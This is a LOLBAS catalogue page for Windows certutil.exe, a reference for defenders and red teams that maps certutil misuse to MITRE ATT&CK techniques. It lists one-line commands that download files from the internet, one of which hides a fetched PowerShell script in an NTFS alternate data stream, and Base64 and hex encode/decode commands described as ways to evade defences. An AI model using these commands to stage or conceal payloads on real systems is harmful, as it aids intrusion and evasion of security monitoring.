Certutil | LOLBAS

.. /Certutil.exe
Star

Download
Alternate data streams
Encode
Decode

Windows binary used for handling certificates

Paths:

Resources:

Acknowledgements:

Detections:

Download

  1. Download and save 7zip to disk in the current folder.

    certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
    Use case
    Download file from Internet
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1105
  2. Download and save 7zip to disk in the current folder.

    certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
    Use case
    Download file from Internet
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1105

Alternate data streams

  1. Download and save a PS1 file to an Alternate Data Stream (ADS).

    certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
    Use case
    Download file from Internet and save it in an NTFS Alternate Data Stream
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1564.004

Encode

  1. Command to encode a file using Base64

    certutil -encode inputFileName encodedOutputFileName
    Use case
    Encode files to evade defensive measures
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1027.013

Decode

  1. Command to decode a Base64 encoded file.

    certutil -decode encodedInputFileName decodedOutputFileName
    Use case
    Decode files to evade defensive measures
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1140
  2. Command to decode a hexadecimal-encoded file decodedOutputFileName

    certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
    Use case
    Decode files to evade defensive measures
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1140